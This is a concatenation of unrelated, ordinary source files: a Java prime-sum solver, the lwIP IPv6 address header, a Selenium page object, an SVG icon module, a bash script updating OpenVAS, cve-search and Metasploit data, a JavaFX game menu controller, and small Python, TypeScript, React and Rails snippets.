public static void main(String[] args) throws Exception{
// 버퍼를 통한 값 입력
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
int N = Integer.parseInt(br.readLine());
prime(); // 프라임 메소드를 통한 소수 구하기
Pointer ptr = new Pointer(0, 0);
int res = 0;
int sum = 0;
while(ptr.end <= idx) { // two pointer 알고리즘 실행
if(sum < N) {
sum += seq[ptr.end++];
continue;
}
if(sum == N) res++;
sum -= seq[ptr.start++];
}
System.out.println(res); // 합해서 N이되느 경우의 수 출력
}
/**
* 포인터 이너 클래스
* @author minchoba
*
*/
private static class Pointer{
int start;
int end;
public Pointer(int start, int end) {
this.start = start;
this.end = end;
}
}
/**
* 소수를 구하는 메소드
*
*/
private static void prime() {
Arrays.fill(isPrime, true);
isPrime[0] = isPrime[1] = false;
for(int i = 2; i < INF; i++) { // 에라토스테네스의 체
if(!isPrime[i]) continue;
for(int j = i + i; j < INF; j += i) {
isPrime[j] = false;
}
}
for(int i = 0; i < INF; i++) { // 구해둔 소수를 연속 배열에 담아줌
if(isPrime[i]) seq[idx++] = i;
}
}
}
|
/**
* @file
*
* IPv6 addresses.
*/
/*
* Copyright (c) 2010 Inico Technologies Ltd.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
* SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
* OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
* IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
* OF SUCH DAMAGE.
*
* This file is part of the lwIP TCP/IP stack.
*
* Author: <NAME> <<EMAIL>>
*
* Structs and macros for handling IPv6 addresses.
*
* Please coordinate changes and requests with Ivan Delamer
* <<EMAIL>>
*/
#ifndef LWIP_HDR_IP6_ADDR_H
#define LWIP_HDR_IP6_ADDR_H
#include "lwip/opt.h"
#include "def.h"
#if LWIP_IPV6 /* don't build if not configured for use in lwipopts.h */
#ifdef __cplusplus
extern "C" {
#endif
/** This is the aligned version of ip6_addr_t,
used as local variable, on the stack, etc. */
struct ip6_addr {
u32_t addr[4];
};
/** IPv6 address */
typedef struct ip6_addr ip6_addr_t;
/** Set an IPv6 partial address given by byte-parts */
#define IP6_ADDR_PART(ip6addr, index, a,b,c,d) \
(ip6addr)->addr[index] = PP_HTONL(LWIP_MAKEU32(a,b,c,d))
/** Set a full IPv6 address by passing the 4 u32_t indices in network byte order
(use PP_HTONL() for constants) */
#define IP6_ADDR(ip6addr, idx0, idx1, idx2, idx3) do { \
(ip6addr)->addr[0] = idx0; \
(ip6addr)->addr[1] = idx1; \
(ip6addr)->addr[2] = idx2; \
(ip6addr)->addr[3] = idx3; } while(0)
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK1(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[0]) >> 16) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK2(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[0])) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK3(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[1]) >> 16) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK4(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[1])) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK5(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[2]) >> 16) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK6(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[2])) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK7(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[3]) >> 16) & 0xffff))
/** Access address in 16-bit block */
#define IP6_ADDR_BLOCK8(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[3])) & 0xffff))
/** Copy IPv6 address - faster than ip6_addr_set: no NULL check */
#define ip6_addr_copy(dest, src) do{(dest).addr[0] = (src).addr[0]; \
(dest).addr[1] = (src).addr[1]; \
(dest).addr[2] = (src).addr[2]; \
(dest).addr[3] = (src).addr[3];}while(0)
/** Safely copy one IPv6 address to another (src may be NULL) */
#define ip6_addr_set(dest, src) do{(dest)->addr[0] = (src) == NULL ? 0 : (src)->addr[0]; \
(dest)->addr[1] = (src) == NULL ? 0 : (src)->addr[1]; \
(dest)->addr[2] = (src) == NULL ? 0 : (src)->addr[2]; \
(dest)->addr[3] = (src) == NULL ? 0 : (src)->addr[3];}while(0)
/** Set complete address to zero */
#define ip6_addr_set_zero(ip6addr) do{(ip6addr)->addr[0] = 0; \
(ip6addr)->addr[1] = 0; \
(ip6addr)->addr[2] = 0; \
(ip6addr)->addr[3] = 0;}while(0)
/** Set address to ipv6 'any' (no need for lwip_htonl()) */
#define ip6_addr_set_any(ip6addr) ip6_addr_set_zero(ip6addr)
/** Set address to ipv6 loopback address */
#define ip6_addr_set_loopback(ip6addr) do{(ip6addr)->addr[0] = 0; \
(ip6addr)->addr[1] = 0; \
(ip6addr)->addr[2] = 0; \
(ip6addr)->addr[3] = PP_HTONL(0x00000001UL);}while(0)
/** Safely copy one IPv6 address to another and change byte order
* from host- to network-order. */
#define ip6_addr_set_hton(dest, src) do{(dest)->addr[0] = (src) == NULL ? 0 : lwip_htonl((src)->addr[0]); \
(dest)->addr[1] = (src) == NULL ? 0 : lwip_htonl((src)->addr[1]); \
(dest)->addr[2] = (src) == NULL ? 0 : lwip_htonl((src)->addr[2]); \
(dest)->addr[3] = (src) == NULL ? 0 : lwip_htonl((src)->addr[3]);}while(0)
/**
* Determine if two IPv6 address are on the same network.
*
* @arg addr1 IPv6 address 1
* @arg addr2 IPv6 address 2
* @return !0 if the network identifiers of both address match
*/
#define ip6_addr_netcmp(addr1, addr2) (((addr1)->addr[0] == (addr2)->addr[0]) && \
((addr1)->addr[1] == (addr2)->addr[1]))
#define ip6_addr_cmp(addr1, addr2) (((addr1)->addr[0] == (addr2)->addr[0]) && \
((addr1)->addr[1] == (addr2)->addr[1]) && \
((addr1)->addr[2] == (addr2)->addr[2]) && \
((addr1)->addr[3] == (addr2)->addr[3]))
#define ip6_get_subnet_id(ip6addr) (lwip_htonl((ip6addr)->addr[2]) & 0x0000ffffUL)
#define ip6_addr_isany_val(ip6addr) (((ip6addr).addr[0] == 0) && \
((ip6addr).addr[1] == 0) && \
((ip6addr).addr[2] == 0) && \
((ip6addr).addr[3] == 0))
#define ip6_addr_isany(ip6addr) (((ip6addr) == NULL) || ip6_addr_isany_val(*(ip6addr)))
#define ip6_addr_isloopback(ip6addr) (((ip6addr)->addr[0] == 0UL) && \
((ip6addr)->addr[1] == 0UL) && \
((ip6addr)->addr[2] == 0UL) && \
((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
#define ip6_addr_isglobal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xe0000000UL)) == PP_HTONL(0x20000000UL))
#define ip6_addr_islinklocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xffc00000UL)) == PP_HTONL(0xfe800000UL))
#define ip6_addr_issitelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xffc00000UL)) == PP_HTONL(0xfec00000UL))
#define ip6_addr_isuniquelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xfe000000UL)) == PP_HTONL(0xfc000000UL))
#define ip6_addr_isipv6mappedipv4(ip6addr) (((ip6addr)->addr[0] == 0) && ((ip6addr)->addr[1] == 0) && (((ip6addr)->addr[2]) == PP_HTONL(0x0000FFFFUL)))
#define ip6_addr_ismulticast(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff000000UL)) == PP_HTONL(0xff000000UL))
#define ip6_addr_multicast_transient_flag(ip6addr) ((ip6addr)->addr[0] & PP_HTONL(0x00100000UL))
#define ip6_addr_multicast_prefix_flag(ip6addr) ((ip6addr)->addr[0] & PP_HTONL(0x00200000UL))
#define ip6_addr_multicast_rendezvous_flag(ip6addr) ((ip6addr)->addr[0] & PP_HTONL(0x00400000UL))
#define ip6_addr_multicast_scope(ip6addr) ((lwip_htonl((ip6addr)->addr[0]) >> 16) & 0xf)
#define IP6_MULTICAST_SCOPE_RESERVED 0x0
#define IP6_MULTICAST_SCOPE_RESERVED0 0x0
#define IP6_MULTICAST_SCOPE_INTERFACE_LOCAL 0x1
#define IP6_MULTICAST_SCOPE_LINK_LOCAL 0x2
#define IP6_MULTICAST_SCOPE_RESERVED3 0x3
#define IP6_MULTICAST_SCOPE_ADMIN_LOCAL 0x4
#define IP6_MULTICAST_SCOPE_SITE_LOCAL 0x5
#define IP6_MULTICAST_SCOPE_ORGANIZATION_LOCAL 0x8
#define IP6_MULTICAST_SCOPE_GLOBAL 0xe
#define IP6_MULTICAST_SCOPE_RESERVEDF 0xf
#define ip6_addr_ismulticast_iflocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff010000UL))
#define ip6_addr_ismulticast_linklocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff020000UL))
#define ip6_addr_ismulticast_adminlocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff040000UL))
#define ip6_addr_ismulticast_sitelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff050000UL))
#define ip6_addr_ismulticast_orglocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff080000UL))
#define ip6_addr_ismulticast_global(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff0e0000UL))
/* @todo define get/set for well-know multicast addresses, e.g. fdf8:f53e:61e4::18 */
#define ip6_addr_isallnodes_iflocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff010000UL)) && \
((ip6addr)->addr[1] == 0UL) && \
((ip6addr)->addr[2] == 0UL) && \
((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
#define ip6_addr_isallnodes_linklocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
((ip6addr)->addr[1] == 0UL) && \
((ip6addr)->addr[2] == 0UL) && \
((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
#define ip6_addr_set_allnodes_linklocal(ip6addr) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
(ip6addr)->addr[1] = 0; \
(ip6addr)->addr[2] = 0; \
(ip6addr)->addr[3] = PP_HTONL(0x00000001UL);}while(0)
#define ip6_addr_isallrouters_linklocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
((ip6addr)->addr[1] == 0UL) && \
((ip6addr)->addr[2] == 0UL) && \
((ip6addr)->addr[3] == PP_HTONL(0x00000002UL)))
#define ip6_addr_set_allrouters_linklocal(ip6addr) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
(ip6addr)->addr[1] = 0; \
(ip6addr)->addr[2] = 0; \
(ip6addr)->addr[3] = PP_HTONL(0x00000002UL);}while(0)
#define ip6_addr_issolicitednode(ip6addr) ( ((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
((ip6addr)->addr[2] == PP_HTONL(0x00000001UL)) && \
(((ip6addr)->addr[3] & PP_HTONL(0xff000000UL)) == PP_HTONL(0xff000000UL)) )
#define ip6_addr_set_solicitednode(ip6addr, if_id) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
(ip6addr)->addr[1] = 0; \
(ip6addr)->addr[2] = PP_HTONL(0x00000001UL); \
(ip6addr)->addr[3] = (PP_HTONL(0xff000000UL) | (if_id));}while(0)
#define ip6_addr_cmp_solicitednode(ip6addr, sn_addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
((ip6addr)->addr[1] == 0) && \
((ip6addr)->addr[2] == PP_HTONL(0x00000001UL)) && \
((ip6addr)->addr[3] == (PP_HTONL(0xff000000UL) | (sn_addr)->addr[3])))
/* IPv6 address states. */
#define IP6_ADDR_INVALID 0x00
#define IP6_ADDR_TENTATIVE 0x08
#define IP6_ADDR_TENTATIVE_1 0x09 /* 1 probe sent */
#define IP6_ADDR_TENTATIVE_2 0x0a /* 2 probes sent */
#define IP6_ADDR_TENTATIVE_3 0x0b /* 3 probes sent */
#define IP6_ADDR_TENTATIVE_4 0x0c /* 4 probes sent */
#define IP6_ADDR_TENTATIVE_5 0x0d /* 5 probes sent */
#define IP6_ADDR_TENTATIVE_6 0x0e /* 6 probes sent */
#define IP6_ADDR_TENTATIVE_7 0x0f /* 7 probes sent */
#define IP6_ADDR_VALID 0x10 /* This bit marks an address as valid (preferred or deprecated) */
#define IP6_ADDR_PREFERRED 0x30
#define IP6_ADDR_DEPRECATED 0x10 /* Same as VALID (valid but not preferred) */
#define IP6_ADDR_TENTATIVE_COUNT_MASK 0x07 /* 1-7 probes sent */
#define ip6_addr_isinvalid(addr_state) (addr_state == IP6_ADDR_INVALID)
#define ip6_addr_istentative(addr_state) (addr_state & IP6_ADDR_TENTATIVE)
#define ip6_addr_isvalid(addr_state) (addr_state & IP6_ADDR_VALID) /* Include valid, preferred, and deprecated. */
#define ip6_addr_ispreferred(addr_state) (addr_state == IP6_ADDR_PREFERRED)
#define ip6_addr_isdeprecated(addr_state) (addr_state == IP6_ADDR_DEPRECATED)
#define ip6_addr_debug_print_parts(debug, a, b, c, d, e, f, g, h) \
LWIP_DEBUGF(debug, ("%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F ":%" X16_F, \
a, b, c, d, e, f, g, h))
#define ip6_addr_debug_print(debug, ipaddr) \
ip6_addr_debug_print_parts(debug, \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK1(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK2(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK3(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK4(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK5(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK6(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK7(ipaddr) : 0), \
(u16_t)((ipaddr) != NULL ? IP6_ADDR_BLOCK8(ipaddr) : 0))
#define ip6_addr_debug_print_val(debug, ipaddr) \
ip6_addr_debug_print_parts(debug, \
IP6_ADDR_BLOCK1(&(ipaddr)), \
IP6_ADDR_BLOCK2(&(ipaddr)), \
IP6_ADDR_BLOCK3(&(ipaddr)), \
IP6_ADDR_BLOCK4(&(ipaddr)), \
IP6_ADDR_BLOCK5(&(ipaddr)), \
IP6_ADDR_BLOCK6(&(ipaddr)), \
IP6_ADDR_BLOCK7(&(ipaddr)), \
IP6_ADDR_BLOCK8(&(ipaddr)))
#define IP6ADDR_STRLEN_MAX 46
int ip6addr_aton(const char *cp, ip6_addr_t *addr);
/** returns ptr to static buffer; not reentrant! */
char *ip6addr_ntoa(const ip6_addr_t *addr);
char *ip6addr_ntoa_r(const ip6_addr_t *addr, char *buf, int buflen);
#ifdef __cplusplus
}
#endif
#endif /* LWIP_IPV6 */
#endif /* LWIP_HDR_IP6_ADDR_H */
|
package pages;
import org.openqa.selenium.By;
import org.openqa.selenium.WebElement;
import static support.TestContext.getDriver;
public class StudentMyAssignments extends SideMenu {
private WebElement buttonGoToAssessment(String myAssignmentName){
return getDriver().findElement(By.xpath("//td[contains(text(),'" + myAssignmentName + "')]/..//button"));
}
}
|
<gh_stars>1-10
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.female = void 0;
var female = {
"viewBox": "0 0 512 512",
"children": [{
"name": "path",
"attribs": {
"d": "M288,284c55.2-14.2,96-64.3,96-124c0-70.7-57.3-128-128-128S128,89.3,128,160c0,59.6,40.8,109.7,96,124v68h-64v64h64v64h64\r\n\tv-64h64v-64h-64V284z M256,240c-44.1,0-80-35.9-80-80s35.9-80,80-80s80,35.9,80,80S300.1,240,256,240z"
},
"children": []
}]
};
exports.female = female; |
#!/bin/bash
# Update the following line to point to your cve-search directory
CVE_SEARCH_DIR=/home/andy/cve-search
# Update the following line to point to your desired log file
LOG=/home/andy/output.log
# this clears the log file by overwriting it with a single
# line containing the date and time to an empty file
date > ${LOG}
# Update OpenVAS data
greenbone-nvt-sync >> ${LOG}
greenbone-scapdata-sync >> ${LOG}
greenbone-certdata-sync >> ${LOG}
service openvas-scanner restart >> ${LOG}
service openvas-manager restart >> ${LOG}
openvasmd --rebuild >> ${LOG}
# Update cve-search data
${CVE_SEARCH_DIR}/sbin/db_updater.py -v >> ${LOG}
# Update system, including OpenVAS
apt-get -y update >> ${LOG}
# Update Metasploit Framework
msfupdate >> ${LOG}
# This add a line to indicate that the update process is done
echo Update process done. >> ${LOG}
|
def generate_response(sender_email, recipient_emails):
if len(recipient_emails) == 1:
response = f"Single recipient: {recipient_emails[0]}"
else:
response = f"Multiple recipients: {len(recipient_emails)}"
return response |
<reponame>ManuelLuzietti/AnOsuSimulator
package it.unibo.osu.view;
import java.awt.Dimension;
import java.awt.Toolkit;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import it.unibo.osu.controller.MusicControllerImpl;
import it.unibo.osu.controller.MusicControllerImplFactory;
import it.unibo.osu.model.User;
import javafx.animation.Animation;
import javafx.animation.FadeTransition;
import javafx.animation.KeyFrame;
import javafx.animation.KeyValue;
import javafx.animation.ParallelTransition;
import javafx.animation.ScaleTransition;
import javafx.animation.Timeline;
import javafx.animation.TranslateTransition;
import javafx.event.EventType;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.geometry.Insets;
import javafx.scene.Node;
import javafx.scene.control.Button;
import javafx.scene.control.Label;
import javafx.scene.control.ScrollPane;
import javafx.scene.control.Slider;
import javafx.scene.image.ImageView;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.Pane;
import javafx.scene.layout.StackPane;
import javafx.scene.layout.VBox;
import javafx.scene.paint.Color;
import javafx.scene.text.Font;
import javafx.stage.Stage;
import javafx.util.Duration;
public class MainMenuController extends Resizeable {
public static final int ICON_FINALPOSITION_X = 1000;
private static final int BOX_SPACING = 20;
public static final int MUSICFADE_DURATION_SECONDS = 3;
public static final int TRANSLATE_HOVER = 50;
public static final double ICONTRANSITION_RATE = 0.1;
public static final int SONGLIST_FADEIN_DURATION_SECONDS = 5;
public static final int MUSIC_TRANSLATE_DURATION_SECONDS = 4;
public static final int FONT_SIZE = 30;
@FXML
private StackPane optionPane;
@FXML
private StackPane optionButton;
@FXML
private StackPane playButton;
@FXML
private StackPane exitButton;
@FXML
private ImageView icon;
@FXML
private AnchorPane pane;
private ScrollPane scrollPane;
@FXML
private VBox vboxButtons;
private ScaleTransition iconTrans;
private Pane fixedPane;
private FadeTransition fadeout;
private Stage stage;
private FadeTransition fadeoutOption;
private FadeTransition fadeinOption;
private HBox options;
private TranslateTransition iconTranslateTransition;
private FadeTransition menuOptionsFadeout;
private ParallelTransition playEventParallelTransition;
private FadeTransition songListFadeInTransition;
private TranslateTransition songListTranslateTransition;
private MusicControllerImpl scrollMenuSound;
private MusicControllerImpl clickMenuSound;
private List<StackPane> mainButtons;
private MusicControllerImpl menuMusic;
private Timeline musicFadeIn;
private Timeline musicFadeOut;
private SongMenuController songMenuController;
public void init(final Stage stage) {
this.stage = stage;
FXMLLoader loader = new FXMLLoader();
loader.setLocation(this.getClass().getResource("/fxml/SongMenu.fxml"));
try {
fixedPane = ((Pane) this.pane.getParent());
this.scrollPane = (ScrollPane) loader.load();
this.songMenuController = (SongMenuController) loader.getController();
this.scrollPane.setLayoutX(-this.fixedPane.getPrefWidth());
this.scrollPane.setOpacity(0);
this.pane.getChildren().add(this.scrollPane);
} catch (IOException e1) {
e1.printStackTrace();
}
this.scrollMenuSound = MusicControllerImplFactory
.getEffectImpl("/music/scrollMenuOptions.wav");
this.clickMenuSound = MusicControllerImplFactory
.getEffectImpl("/music/clickMenuOptions.wav");
this.setInputHandlers();
this.initializeTransitions();
this.initializeSounds();
this.gameOptions();
this.mainButtons = new ArrayList<>();
this.mainButtons.add(this.playButton);
this.mainButtons.add(this.optionButton);
this.mainButtons.add(this.exitButton);
this.menuMusic = MusicControllerImplFactory
.getSimpleMusicImpl("/tracks/joshiraku.wav");
this.musicFadeIn = new Timeline(new KeyFrame(Duration.seconds(0),
new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)),
new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(),
User.getMusicVolume())));
}
private void initializeSounds() {
}
private void setInputHandlers() {
this.exitButton.setOnMouseClicked(exitEvent -> {
this.clickMenuSound.onNotify();
this.musicFadeOut = new Timeline(
new KeyFrame(Duration.seconds(0), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(),
User.getMusicVolume())),
new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS),
new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)));
this.musicFadeOut.play();
//this.stage.getOnCloseRequest().handle(null);
this.stage.close();
});
this.playButton.setOnMouseClicked(playEvent -> {
if (this.options.getOpacity() == 1) {
this.fadeoutOption.play();
}
this.musicFadeOut = new Timeline(new KeyFrame(Duration.seconds(0), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), User.getMusicVolume())),
new KeyFrame(Duration.seconds(MUSICFADE_DURATION_SECONDS), new KeyValue(this.menuMusic.getMediaPlayer().volumeProperty(), 0)));
this.musicFadeOut.play();
this.clickMenuSound.onNotify();
this.songMenuController.updateEffectsVolume();
this.playEventParallelTransition.play();
});
this.optionButton.setOnMouseClicked(optionsEvent -> {
if (this.options.getOpacity() == 1) {
this.fadeoutOption.play();
} else {
this.fadeinOption.play();
}
this.clickMenuSound.onNotify();
});
this.exitButton.setOnMouseEntered(e1 -> {
this.scrollMenuSound.onNotify();
buttonEffect((Node) this.exitButton, MouseEvent.MOUSE_ENTERED);
});
this.exitButton.setOnMouseExited(e2 -> {
buttonEffect((Node) this.exitButton, MouseEvent.MOUSE_EXITED);
});
this.optionButton.setOnMouseEntered(e3 -> {
this.scrollMenuSound.onNotify();
buttonEffect((Node) this.optionButton, MouseEvent.MOUSE_ENTERED);
});
this.optionButton.setOnMouseExited(e4 -> {
buttonEffect((Node) this.optionButton, MouseEvent.MOUSE_EXITED);
});
this.playButton.setOnMouseEntered(e5 -> {
this.scrollMenuSound.onNotify();
buttonEffect((Node) this.playButton, MouseEvent.MOUSE_ENTERED);
});
this.playButton.setOnMouseExited(e6 -> {
buttonEffect((Node) this.playButton, MouseEvent.MOUSE_EXITED);
});
}
private void buttonEffect(final Node node, final EventType<MouseEvent> mouseEntered) {
if (mouseEntered.equals(MouseEvent.MOUSE_ENTERED)) {
node.setTranslateX(TRANSLATE_HOVER);
} else {
node.setTranslateX(-TRANSLATE_HOVER);
}
}
private void initializeTransitions() {
this.iconTrans = new ScaleTransition();
this.iconTrans.setNode(this.icon);
this.iconTrans.setAutoReverse(true);
this.iconTrans.setCycleCount(Animation.INDEFINITE);
this.iconTrans.setDuration(Duration.seconds(1));
this.iconTrans.setByX(ICONTRANSITION_RATE);
this.iconTrans.setByY(ICONTRANSITION_RATE);
this.fadeout = new FadeTransition();
this.fadeout.setNode(this.fixedPane);
this.fadeout.setFromValue(1);
this.fadeout.setToValue(0);
this.fadeout.setDuration(Duration.seconds(1));
this.fadeout.setOnFinished(e -> {
this.fixedPane.getChildren().remove(this.pane);
this.fadeout.setFromValue(0);
this.fadeout.setToValue(1);
this.fadeout.setDuration(Duration.seconds(1));
this.fadeout.setOnFinished(null);
this.fadeout.playFromStart();
});
this.menuOptionsFadeout = new FadeTransition(Duration.seconds(1), this.vboxButtons);
this.menuOptionsFadeout.setToValue(0);
this.menuOptionsFadeout.setFromValue(1);
this.menuOptionsFadeout.setOnFinished(finished -> {
this.mainButtons.forEach(button -> button.setVisible(false));
});
this.iconTranslateTransition = new TranslateTransition(Duration.seconds(MUSICFADE_DURATION_SECONDS), this.icon);
this.iconTranslateTransition.setToX(ICON_FINALPOSITION_X);
this.songListFadeInTransition = new FadeTransition(Duration.seconds(SONGLIST_FADEIN_DURATION_SECONDS), this.scrollPane);
this.songListFadeInTransition.setToValue(1);
this.songListTranslateTransition = new TranslateTransition(Duration.seconds(MUSIC_TRANSLATE_DURATION_SECONDS), this.scrollPane);
this.songListTranslateTransition.setToX(this.fixedPane.getPrefWidth());
this.playEventParallelTransition = new ParallelTransition(this.iconTranslateTransition, this.menuOptionsFadeout, this.songListFadeInTransition,
this.songListTranslateTransition);
}
public void startAnimation() {
this.iconTrans.play();
this.menuMusic.startMusic();
this.musicFadeIn.play();
}
private void gameOptions() {
this.options = new HBox(BOX_SPACING);
this.options.setOpacity(0.);
this.fadeoutOption = new FadeTransition(Duration.seconds(2), options);
fadeoutOption.setFromValue(1.0);
fadeoutOption.setToValue(0);
this.fadeinOption = new FadeTransition(Duration.seconds(2), options);
this.fadeinOption.setFromValue(0);
this.fadeinOption.setToValue(1);
//row 1
Label resolution = new Label("Resolution");
resolution.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
resolution.setTextFill(Color.WHITE);
//row 2
HBox hb = new HBox(BOX_SPACING);
Button full = new NeonButton("Full screen").getButton();
Button medium = new NeonButton("1920x1080").getButton();
Button quadratic = new NeonButton("640x480").getButton();
hb.getChildren().addAll(full, medium, quadratic);
options.getChildren().addAll(resolution, hb);
//row 3
Label showFPS = new Label("Show FPS on Game");
showFPS.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
showFPS.setTextFill(Color.WHITE);
//row 4
HBox hb1 = new HBox(BOX_SPACING);
Button yes = new NeonButton("Yes").getButton();
Button no = new NeonButton("No").getButton();
hb1.getChildren().addAll(yes, no);
options.getChildren().addAll(showFPS, hb1);
//row 5
Label volume = new Label("Volume");
volume.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
volume.setTextFill(Color.WHITE);
//row 6
Slider slider = new Slider(0, 1, 1);
slider.valueProperty().addListener(changed -> {
User.setMusicVolume(slider.getValue());
});
slider.setOnMouseReleased(released -> {
this.menuMusic.getMediaPlayer().setVolume(User.getMusicVolume());
});
options.getChildren().addAll(volume, slider);
//row 7
Label volumeSfx = new Label("Volume effetti");
volumeSfx.setFont(new Font("Inconsolata Condensed ExtraBold", FONT_SIZE));
volumeSfx.setTextFill(Color.WHITE);
//row 8
Slider sliderSfx = new Slider(0, 1, 1);
sliderSfx.valueProperty().addListener(changed -> {
User.setEffectVolume(sliderSfx.getValue());
});
sliderSfx.setOnMouseReleased(realeased -> {
this.clickMenuSound.getMediaPlayer().setVolume(User.getEffectVolume());
this.scrollMenuSound.getMediaPlayer().setVolume(User.getEffectVolume());
});
options.getChildren().addAll(volumeSfx, sliderSfx);
Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
full.setOnMouseClicked(e -> {
this.changeResolution(this.fixedPane, screenSize.width, screenSize.height);
this.stage.setFullScreen(true);
});
medium.setOnMouseClicked(e -> {
this.stage.setFullScreen(false);
this.changeResolution(this.fixedPane, 1920, 1080);
});
quadratic.setOnMouseClicked(e -> {
this.stage.setFullScreen(false);
this.changeResolution(this.fixedPane, 640, 480);
});
this.optionPane.setPadding(new Insets(0, 0, 0, FONT_SIZE));
this.optionPane.getChildren().add(options);
}
@Override
public void changeResolution(final Pane pane, final double width, final double height) {
super.changeResolution(pane, width, height);
this.stage.sizeToScene();
this.stage.centerOnScreen();
}
}
|
<filename>hypfs-master/javascript/node_modules/@iota/area-codes/typings/index.d.ts
export * from "./iacCodeArea";
export * from "./iacDimensions";
export * from "./codePrecision";
export * from "./conversion";
export * from "./precision";
export * from "./extract";
export * from "./validation";
|
import React, { useRef } from 'react';
import useDraggable from '../hooks/useDraggable';
const Item = ({ id, contents }) => {
const dragRef = useRef();
const { isDragging } = useDraggable({
id,
ref: dragRef,
});
return (
<article className="item" ref={dragRef}>
<h3>{contents}</h3>
<p>{`id : #${id}`}</p>
</article>
);
};
export default React.memo(Item);
|
<filename>app/models/note.rb
class Note < ApplicationRecord
belongs_to :bat
belongs_to :researcher
validates :content, presence: true
end
|
